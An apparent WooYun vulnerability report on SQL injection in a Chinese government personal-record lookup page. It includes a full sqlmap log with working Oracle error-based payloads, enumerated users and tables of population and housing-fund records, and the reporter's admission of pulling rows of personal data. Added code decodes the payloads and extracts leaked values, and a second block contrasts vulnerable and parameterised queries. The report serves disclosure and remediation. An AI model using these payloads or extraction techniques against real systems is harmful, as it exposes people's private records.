WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2015-09-17: Details sent to the vendor, awaiting vendor handling
2015-09-19: Vendor confirmed; details visible to the vendor only
2015-09-29: Details disclosed to core white hats and experts in the relevant field
2015-10-09: Details disclosed to regular white hats
2015-10-19: Details disclosed to intern white hats
2015-11-03: Details disclosed to the public
SQL injection present
http://**.**.**.**/chaxun_geren.asp
The individual-record lookup page; the injection is here.
[01:06:47] [INFO] testing connection to the target URL
[01:06:48] [INFO] testing if the target URL is stable. This can take a couple of seconds
[01:06:50] [INFO] target URL is stable
[01:06:50] [INFO] testing if POST parameter 'RealName' is dynamic
[01:06:50] [WARNING] POST parameter 'RealName' does not appear dynamic
[01:06:50] [INFO] heuristic (basic) test shows that POST parameter 'RealName' might be injectable (possible DBMS: 'Oracle')
[01:06:50] [INFO] testing for SQL injection on POST parameter 'RealName'
[01:06:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:06:55] [WARNING] reflective value(s) found and filtering out
[01:06:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:07:00] [INFO] POST parameter 'RealName' is 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' injectable
[01:07:07] [INFO] testing 'Oracle inline queries'
[01:07:07] [INFO] testing 'Oracle AND time-based blind'
[01:07:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[01:07:07] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[01:07:08] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[01:07:10] [INFO] target URL appears to have 1 column in query
POST parameter 'RealName' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[01:07:14] [INFO] testing if POST parameter 'UserIDCard' is dynamic
[01:07:14] [WARNING] POST parameter 'UserIDCard' does not appear dynamic
[01:07:15] [INFO] heuristic (basic) test shows that POST parameter 'UserIDCard' might be injectable (possible DBMS: 'Oracle')
[01:07:15] [INFO] testing for SQL injection on POST parameter 'UserIDCard'
[01:07:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:07:22] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:07:25] [INFO] POST parameter 'UserIDCard' is 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' injectable
[01:07:25] [INFO] testing 'Oracle inline queries'
[01:07:25] [INFO] testing 'Oracle AND time-based blind'
[01:07:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
POST parameter 'UserIDCard' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 59 HTTP(s) requests:
---
Place: POST
Parameter: RealName
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: RealName=111' AND 7087=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(114)||CHR(115)||CHR(114)||CHR(113)||(SELECT (CASE WHEN (7087=7087) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(101)||CHR(114)||CHR(113)||CHR(62))) FROM DUAL) AND 'AcMJ'='AcMJ&UserIDCard=222&GetType=0&button=%B2%E9%D1%AF

Place: POST
Parameter: UserIDCard
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: RealName=111&UserIDCard=222' AND 2427=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(114)||CHR(115)||CHR(114)||CHR(113)||(SELECT (CASE WHEN (2427=2427) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(101)||CHR(114)||CHR(113)||CHR(62))) FROM DUAL) AND 'RJbB'='RJbB&GetType=0&button=%B2%E9%D1%AF
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: RealName, type: Single quoted string (default)
[1] place: POST, parameter: UserIDCard, type: Single quoted string
[q] Quit
> 0
[01:07:46] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5
back-end DBMS: Oracle
[01:07:46] [INFO] fetching current user
[01:07:46] [INFO] retrieved: XYS_DATA
current user: 'XYS_DATA'
[01:07:46] [INFO] fetching current database
[01:07:46] [INFO] resumed: XYS_DATA
[01:07:46] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'XYS_DATA'
[01:07:46] [INFO] testing if current user is DBA
current user is DBA: False
database management system users [42]:
[*] AMBULANCE
[*] ANONYMOUS
[*] APEX_030200
[*] APEX_PUBLIC_USER
[*] APPQOSSYS
[*] BI
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] EXFSYS
[*] FAREN
[*] FLOWS_FILES
[*] HR
[*] IX
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] OCCIWRAPPER
[*] OE
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDDATA
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] OWBSYS_AUDIT
[*] PM
[*] SCOTT
[*] SH
[*] SI_INFORMTN_SCHEMA
[*] SPATIAL_CSW_ADMIN_USR
[*] SPATIAL_WFS_ADMIN_USR
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TAIJI
[*] WMSYS
[*] XDB
[*] XS$NULL
[*] XYS_DATA
[*] XYS_DATA_IMPORT
available databases [9]:
[*] APEX_030200
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] XDB
[*] XYS_DATA
Database: XYS_DATA
+-----------------------+---------+
| Table                 | Entries |
+-----------------------+---------+
| TBL_BASE_POPULATION   | 7505097 |
| TBL_SHEET_INFO_14     | 5186324 |
| BAK_SHEET_INFO_13     | 5178531 |
| WJW_EXTEND_CZRKPERSON | 4946198 |
| BAK_BASE_POPULATION   | 3770536 |
| TBL_SHEET_INFO_4      | 3710291 |
| WJW_EXTEND_LDRKPERSON | 398605  |
| TBL_SHEET_INFO_3      | 380000  |
| TBL_SHEET_INFO_8      | 376036  |
| TBL_SHEET_INFO_11     | 371212  |
| GJJ_EXTENDS_PERSON    | 357117  |
| TBL_SHEET_INFO_9      | 312138  |
| YGT_EXTEND_POPULATION | 200185  |
| TBL_BASE_ENTERPRISE   | 73195   |
| TBL_SHEET_INFO_22     | 45827   |
| TBL_SHEET_INFO_6      | 13468   |
| YGT_EXTEND_ENTERPRISE | 5680    |
| TBL_SHEET_INFO_26     | 1015    |
| TBL_SHEET_INFO_25     | 164     |
| TBL_SHEET_INFO_16     | 107     |
| TBL_SHEET_INFO_30     | 61      |
| TBL_SHEET_INFO_15     | 40      |
| TBL_SHEET_INFO_17     | 34      |
| TBL_SHEET_INFO_29     | 4       |
| TBL_SHEET_INFO_18     | 1       |
+-----------------------+---------+
| GJJ_EXTENDS_PERSON    | 357117  |
| WJW_EXTEND_CZRKPERSON | 4946198 |
| WJW_EXTEND_LDRKPERSON | 398605  |
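To read the sqlmap payloads above, it helps to decode the CHR() chains and see what the database actually parses. The following is an added example, not part of the original report or of sqlmap: it rewrites the RealName payload's CHR() runs as string literals, recovers the two sentinel strings sqlmap wraps the leaked value in (qrsrq / qverq), and pulls the value back out of an error page. The error page text is constructed for the example; the exact ORA-/LPX- wording depends on the Oracle version and the ASP error handler.

```python
import re
from typing import Optional

# The RealName payload sqlmap reported above, minus the other form fields.
# Copied from the page; everything else in this block is an added example.
SQLMAP_PAYLOAD = (
    "111' AND 7087=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(114)||"
    "CHR(115)||CHR(114)||CHR(113)||(SELECT (CASE WHEN (7087=7087) THEN 1 ELSE 0 END) "
    "FROM DUAL)||CHR(113)||CHR(118)||CHR(101)||CHR(114)||CHR(113)||CHR(62))) "
    "FROM DUAL) AND 'AcMJ'='AcMJ"
)

# A run of CHR(n)||CHR(m)||... with no other expression spliced in between.
_CHR_CHAIN = re.compile(r"(?:CHR\(\d+\)\|\|)*CHR\(\d+\)")


def decode_chr_chains(payload: str) -> str:
    """Rewrite every CHR() chain as the quoted string literal it evaluates to.

    sqlmap spells its strings with CHR() so no quote characters appear in the
    injected text (quotes are often filtered); decoding shows what Oracle sees.
    """
    def repl(match: "re.Match[str]") -> str:
        codes = re.findall(r"CHR\((\d+)\)", match.group(0))
        return "'" + "".join(chr(int(c)) for c in codes) + "'"
    return _CHR_CHAIN.sub(repl, payload)


def markers_from_payload(payload: str) -> tuple:
    """Return the (start, end) sentinels that bracket the leaked value.

    Decoded, the XMLType argument is '<:qrsrq' || (subquery) || 'qverq>'.
    A tag name starting with ':' is not a valid XML name, so XMLType() raises
    a parse error whose message echoes the rejected name, subquery result
    included. That echo is the error-based exfiltration channel.
    """
    decoded = decode_chr_chains(payload)
    m = re.search(r"'<:(\w+)'\|\|\(SELECT .*?\)\|\|'(\w+)>'", decoded)
    if not m:
        raise ValueError("not a sqlmap XMLType error-based payload")
    return m.group(1), m.group(2)


def extract_leaked_value(response_body: str, start: str, end: str) -> Optional[str]:
    """Pull the text between the two sentinels out of an error page, or None."""
    m = re.search(re.escape(start) + r"(.*?)" + re.escape(end), response_body, re.S)
    return m.group(1) if m else None


# Constructed stand-in for the error page this technique depends on; the
# wording is illustrative only (assumption, not captured from the target).
SAMPLE_ERROR_PAGE = (
    "Microsoft OLE DB Provider for Oracle error '80004005'\n"
    "ORA-31011: XML parsing failed\n"
    "LPX-00110: Warning: invalid QName \":qrsrq1qverq\"\n"
)

if __name__ == "__main__":
    start, end = markers_from_payload(SQLMAP_PAYLOAD)
    print(decode_chr_chains(SQLMAP_PAYLOAD))
    print("sentinels:", start, end)
    print("leaked:", extract_leaked_value(SAMPLE_ERROR_PAGE, start, end))
```

In the detection phase the subquery is just `CASE WHEN (7087=7087) THEN 1 ELSE 0 END`, so the leaked value is "1"; once the technique is confirmed, sqlmap swaps in `SELECT USER FROM DUAL`, table names and row data, which is how the user list and table counts above were read back one response at a time.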
I pulled 10 rows from GJJ_EXTENDS_PERSON to check: you can see each month's housing provident fund contribution and the fund balance, plus some related information. Not sure whether that counts as sensitive?
The DepartmentName and DepartmentNum mentioned in http://**.**.**.**/bugs/wooyun-2015-0129844 still have not been fixed!
As above.
Fix: filter the input. Filtering alone is fragile, though; pass RealName and UserIDCard to Oracle as bind variables instead of concatenating them into the SQL string, and keep the input whitelist as a second layer.
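The two lookup patterns side by side, as an added example that is not the site's code (the page is classic ASP on IIS; the real query is not shown in the report). SQLite is used as an offline stand-in for Oracle, the `:name` placeholder style is the one Oracle uses for bind variables, and the table rows and column names are constructed assumptions (RealName/UserIDCard are the POST field names from the report, reused as columns).

```python
import re
import sqlite3

# Constructed rows standing in for the lookup table. The report names
# TBL_BASE_POPULATION but not its columns; the column names are assumptions.
SAMPLE_ROWS = [
    ("Zhang San", "110101199001011234"),
    ("Li Si", "110101198502022345"),
    ("Wang Wu", "11010119780303345X"),
]


def make_db() -> sqlite3.Connection:
    """In-memory SQLite stands in for the Oracle backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE TBL_BASE_POPULATION (RealName TEXT, UserIDCard TEXT)")
    conn.executemany("INSERT INTO TBL_BASE_POPULATION VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_concat(conn: sqlite3.Connection, real_name: str, id_card: str) -> list:
    """Vulnerable pattern: form fields pasted into the SQL text.

    A value such as  111' OR 'a'='a  closes the quoted literal and becomes
    SQL, the same mechanism the ' AND ... AND 'AcMJ'='AcMJ payloads rely on.
    """
    sql = ("SELECT RealName, UserIDCard FROM TBL_BASE_POPULATION "
           f"WHERE RealName = '{real_name}' AND UserIDCard = '{id_card}'")
    return conn.execute(sql).fetchall()


def lookup_bound(conn: sqlite3.Connection, real_name: str, id_card: str) -> list:
    """Fixed pattern: bind variables. The statement text is constant; the
    values travel separately and cannot change its structure."""
    sql = ("SELECT RealName, UserIDCard FROM TBL_BASE_POPULATION "
           "WHERE RealName = :real_name AND UserIDCard = :id_card")
    return conn.execute(sql, {"real_name": real_name, "id_card": id_card}).fetchall()


# Whitelist filtering, the fix the report suggests. Worth keeping as a second
# layer (it rejects junk early), but not a substitute for bind variables.
_ID_CARD = re.compile(r"\d{17}[\dX]")                       # 18-character PRC ID number
_NAME = re.compile(r"[\u4e00-\u9fff\u00b7A-Za-z ]{1,50}")    # CJK, middle dot, Latin


def inputs_are_valid(real_name: str, id_card: str) -> bool:
    return bool(_NAME.fullmatch(real_name) and _ID_CARD.fullmatch(id_card.upper()))


if __name__ == "__main__":
    db = make_db()
    evil_name, evil_card = "111' OR 'a'='a", "222' OR 'b'='b"
    print("concat, injected :", lookup_concat(db, evil_name, evil_card))   # every row
    print("bound, injected  :", lookup_bound(db, evil_name, evil_card))    # no rows
    print("bound, legitimate:", lookup_bound(db, "Li Si", "110101198502022345"))
    print("filter accepts injected input?", inputs_are_valid(evil_name, evil_card))
```

With the injected values the concatenated query becomes `WHERE RealName = '111' OR 'a'='a' AND UserIDCard = '222' OR 'b'='b'`, which is true for every row; the bound version compares the literal string `111' OR 'a'='a` against the column and returns nothing.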
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-09-19 18:34
CNVD confirmed and reproduced the vulnerability as described, and has forwarded it via CNCERT to the Shaanxi branch center, which will coordinate remediation with the website's operating unit.
None yet